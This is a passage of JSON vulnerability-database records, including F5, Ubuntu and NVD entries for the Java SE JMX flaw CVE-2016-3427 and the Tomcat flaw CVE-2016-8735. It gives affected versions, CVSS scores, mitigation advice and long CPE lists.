12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP Edge Gateway| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| Tomcat, Configuration utility \nBIG-IP GTM| 11.4.0 - 11.6.1 \n11.2.1 \n10.1.0 - 10.2.4| None| Medium| Tomcat, Configuration utility \nBIG-IP Link Controller| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP PEM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP PSM| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| None| Medium| Tomcat, Configuration utility \nBIG-IP WebAccelerator| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| Tomcat, Configuration utility \nBIG-IP WOM| 11.2.1 \n10.2.1 - 10.2.4| None| Medium| Tomcat, Configuration utility \nARX| 6.2.0 - 6.4.0| None| Low| Java SE \nEnterprise Manager| 3.1.1| None| Medium| JRE \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Medium| JRE \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| JRE \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| JRE \nBIG-IQ ADC| 4.5.0| None| Medium| JRE \nBIG-IQ Centralized Management| 5.0.0 - 5.1.0 \n4.6.0| None| Medium| JRE \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| JRE \nF5 iWorkflow| 2.0.0 - 2.0.2| None| Medium| JRE \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 5.0.0 \n4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| None| Low| Java SE\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, F5 recommends that you avoid exposing JMX RMI ports through management or data interfaces.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-05-28T08:22:00", "type": "f5", "title": "Oracle Java SE vulnerability CVE-2016-3427", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2017-04-06T16:50:00", "id": "F5:K73112451", "href": "https://support.f5.com/csp/article/K73112451", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:45:13", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, F5 recommends that you avoid exposing JMX RMI ports through management or data interfaces.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-05-27T00:00:00", "type": "f5", "title": "SOL73112451 - Oracle Java SE vulnerability CVE-2016-3427", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2016-05-27T00:00:00", "id": "SOL73112451", "href": "http://support.f5.com/kb/en-us/solutions/public/k/73/sol73112451.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntucve": [{"lastseen": "2023-12-06T15:44:46", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x\nbefore 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before\n9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach\nJMX ports. The issue exists because this listener wasn't updated for\nconsistency with the CVE-2016-3427 Oracle patch that affected credential\ntypes.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802312>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-24T00:00:00", "type": "ubuntucve", "title": "CVE-2016-8735", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2016-11-24T00:00:00", "id": "UB:CVE-2016-8735", "href": "https://ubuntu.com/security/CVE-2016-8735", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T15:58:43", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE\nEmbedded 8u77; and JRockit R28.3.9 allows remote attackers to affect\nconfidentiality, integrity, and availability via vectors related to JMX.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2016-04-21T00:00:00", "type": "ubuntucve", "title": "CVE-2016-3427", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2016-04-21T00:00:00", "id": "UB:CVE-2016-3427", "href": "https://ubuntu.com/security/CVE-2016-3427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-12-07T15:17:52", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T21:59:00", "type": "cve", "title": "CVE-2016-8735", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2023-11-07T02:36:00", "cpe": ["cpe:/a:apache:tomcat:6.0.10", "cpe:/a:apache:tomcat:7.0.57", "cpe:/a:apache:tomcat:7.0.66", "cpe:/a:apache:tomcat:7.0.19", "cpe:/a:apache:tomcat:6.0.24", "cpe:/a:apache:tomcat:7.0.59", "cpe:/a:apache:tomcat:6.0.2", "cpe:/a:apache:tomcat:8.0.38", "cpe:/a:apache:tomcat:8.0.33", "cpe:/a:apache:tomcat:7.0.28", "cpe:/a:apache:tomcat:8.5.0", "cpe:/a:apache:tomcat:8.0.20", "cpe:/a:apache:tomcat:7.0.16", "cpe:/a:apache:tomcat:7.0.70", "cpe:/a:apache:tomcat:6.0.9", "cpe:/a:apache:tomcat:8.0.14", "cpe:/a:apache:tomcat:7.0.0", "cpe:/a:apache:tomcat:8.0.28", "cpe:/a:apache:tomcat:8.5.2", "cpe:/a:apache:tomcat:6.0.46", "cpe:/a:apache:tomcat:6.0.22", "cpe:/a:apache:tomcat:8.0.4", "cpe:/a:apache:tomcat:8.0.32", "cpe:/a:apache:tomcat:8.0.24", "cpe:/a:apache:tomcat:7.0.55", "cpe:/a:apache:tomcat:8.0.16", "cpe:/a:apache:tomcat:6.0.5", "cpe:/a:apache:tomcat:7.0.43", "cpe:/a:apache:tomcat:6.0.37", "cpe:/a:apache:tomcat:7.0.2", "cpe:/a:apache:tomcat:6.0.30", "cpe:/a:apache:tomcat:8.0.17", "cpe:/a:apache:tomcat:8.0.19", "cpe:/a:apache:tomcat:8.5.4", "cpe:/a:apache:tomcat:6.0.0", "cpe:/a:apache:tomcat:7.0.4", "cpe:/a:apache:tomcat:7.0.41", "cpe:/a:apache:tomcat:6.0.43", "cpe:/a:apache:tomcat:7.0.13", "cpe:/a:apache:tomcat:8.0.34", "cpe:/a:apache:tomcat:6.0.31", "cpe:/a:apache:tomcat:6.0.27", "cpe:/a:apache:tomcat:8.0.2", "cpe:/a:apache:tomcat:8.0.22", "cpe:/a:apache:tomcat:8.0.21", "cpe:/a:apache:tomcat:7.0.11", "cpe:/a:apache:tomcat:8.0.35", "cpe:/a:apache:tomcat:6.0.15", "cpe:/a:apache:tomcat:6.0.28", "cpe:/a:apache:tomcat:8.0.1", "cpe:/a:apache:tomcat:7.0.47", "cpe:/a:apache:tomcat:6.0.35", "cpe:/a:apache:tomcat:7.0.24", "cpe:/a:apache:tomcat:7.0.3", "cpe:/a:apache:tomcat:8.0.18", "cpe:/a:apache:tomcat:7.0.61", "cpe:/a:apache:tomcat:8.5.5", "cpe:/a:apache:tomcat:7.0.38", "cpe:/a:apache:tomcat:6.0.36", "cpe:/a:apache:tomcat:8.0.5", "cpe:/a:apache:tomcat:7.0.23", "cpe:/a:apache:tomcat:7.0.26", "cpe:/a:apache:tomcat:6.0.47", "cpe:/a:apache:tomcat:8.0.7", "cpe:/a:apache:tomcat:8.0.13", "cpe:/a:apache:tomcat:6.0.17", "cpe:/a:apache:tomcat:6.0.18", "cpe:/a:apache:tomcat:6.0.33", "cpe:/a:apache:tomcat:7.0.34", "cpe:/a:apache:tomcat:7.0.72", "cpe:/a:apache:tomcat:7.0.8", "cpe:/a:apache:tomcat:8.5.3", "cpe:/a:apache:tomcat:6.0.3", "cpe:/a:apache:tomcat:6.0.41", "cpe:/a:apache:tomcat:7.0.33", "cpe:/a:apache:tomcat:6.0.11", "cpe:/a:apache:tomcat:7.0.32", "cpe:/a:apache:tomcat:6.0.44", "cpe:/a:apache:tomcat:8.0.30", "cpe:/a:apache:tomcat:7.0.1", "cpe:/a:apache:tomcat:6.0.40", "cpe:/a:apache:tomcat:7.0.68", "cpe:/a:apache:tomcat:8.0.37", "cpe:/a:apache:tomcat:8.5.1", "cpe:/a:apache:tomcat:6.0.4", "cpe:/a:apache:tomcat:7.0.22", "cpe:/a:apache:tomcat:8.0.12", "cpe:/a:apache:tomcat:6.0.42", "cpe:/a:apache:tomcat:6.0.13", "cpe:/a:apache:tomcat:7.0.69", "cpe:/a:apache:tomcat:7.0.12", "cpe:/a:apache:tomcat:7.0.7", "cpe:/a:apache:tomcat:6.0.23", "cpe:/a:apache:tomcat:8.0.29", "cpe:/a:apache:tomcat:6.0.14", "cpe:/a:apache:tomcat:7.0.29", "cpe:/a:apache:tomcat:6.0.21", "cpe:/a:apache:tomcat:7.0.51", "cpe:/a:apache:tomcat:7.0.15", "cpe:/a:apache:tomcat:7.0.37", "cpe:/a:apache:tomcat:7.0.17", "cpe:/a:apache:tomcat:7.0.46", "cpe:/a:apache:tomcat:6.0.32", "cpe:/a:apache:tomcat:7.0.65", "cpe:/a:apache:tomcat:6.0.19", "cpe:/a:apache:tomcat:7.0.64", "cpe:/a:apache:tomcat:7.0.42", "cpe:/a:apache:tomcat:7.0.53", "cpe:/a:apache:tomcat:8.0.25", "cpe:/a:apache:tomcat:7.0.63", "cpe:/a:apache:tomcat:7.0.48", "cpe:/a:apache:tomcat:7.0.10", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:8.0.8", "cpe:/a:apache:tomcat:6.0.6", "cpe:/a:apache:tomcat:8.0.26", "cpe:/a:apache:tomcat:7.0.36", "cpe:/a:apache:tomcat:6.0.34", "cpe:/a:apache:tomcat:8.0.36", "cpe:/a:apache:tomcat:7.0.27", "cpe:/a:apache:tomcat:8.0.27", "cpe:/a:apache:tomcat:7.0.45", "cpe:/a:apache:tomcat:7.0.5", "cpe:/a:apache:tomcat:7.0.58", "cpe:/a:apache:tomcat:6.0.29", "cpe:/a:apache:tomcat:7.0.71", "cpe:/a:apache:tomcat:7.0.67", "cpe:/a:apache:tomcat:6.0.39", "cpe:/a:apache:tomcat:6.0.25", "cpe:/a:apache:tomcat:7.0.40", "cpe:/a:apache:tomcat:8.0.3", "cpe:/a:apache:tomcat:7.0.39", "cpe:/a:apache:tomcat:6.0.26", "cpe:/a:apache:tomcat:7.0.54", "cpe:/a:apache:tomcat:6.0.7", "cpe:/a:apache:tomcat:6.0.45", "cpe:/a:apache:tomcat:7.0.21", "cpe:/a:apache:tomcat:8.0.23", "cpe:/a:apache:tomcat:8.0.15", "cpe:/a:apache:tomcat:6.0.20", "cpe:/a:apache:tomcat:8.0.31", "cpe:/a:apache:tomcat:7.0.31", "cpe:/a:apache:tomcat:8.0.10", "cpe:/a:apache:tomcat:7.0.50", "cpe:/a:apache:tomcat:6.0.38", "cpe:/a:apache:tomcat:8.5.6", "cpe:/a:apache:tomcat:7.0.62", "cpe:/a:apache:tomcat:7.0.14", "cpe:/a:apache:tomcat:7.0.60", "cpe:/a:apache:tomcat:7.0.44", "cpe:/a:apache:tomcat:7.0.18", "cpe:/a:apache:tomcat:8.0.9", "cpe:/a:apache:tomcat:7.0.20", "cpe:/a:apache:tomcat:8.0.11", "cpe:/a:apache:tomcat:7.0.6", "cpe:/a:apache:tomcat:7.0.9", "cpe:/a:apache:tomcat:7.0.49", "cpe:/a:apache:tomcat:7.0.56", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:6.0.12", "cpe:/a:apache:tomcat:6.0.8", "cpe:/a:apache:tomcat:7.0.25", "cpe:/a:apache:tomcat:6.0.1", "cpe:/a:apache:tomcat:6.0.16", "cpe:/a:apache:tomcat:7.0.35", "cpe:/a:apache:tomcat:8.0.6", "cpe:/a:apache:tomcat:7.0.52", "cpe:/a:apache:tomcat:7.0.30"], "id": "CVE-2016-8735", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8735", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:tomcat:9.0.0:m10:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.71:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.67:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.66:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m8:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.63:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m9:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.55:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.69:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m5:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.56:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m4:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.64:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.70:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.68:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.57:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m3:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m2:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.59:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.51:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m7:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.52:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.53:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.60:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.48:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.62:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m6:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.7:*:*:*:*:*:*:*", 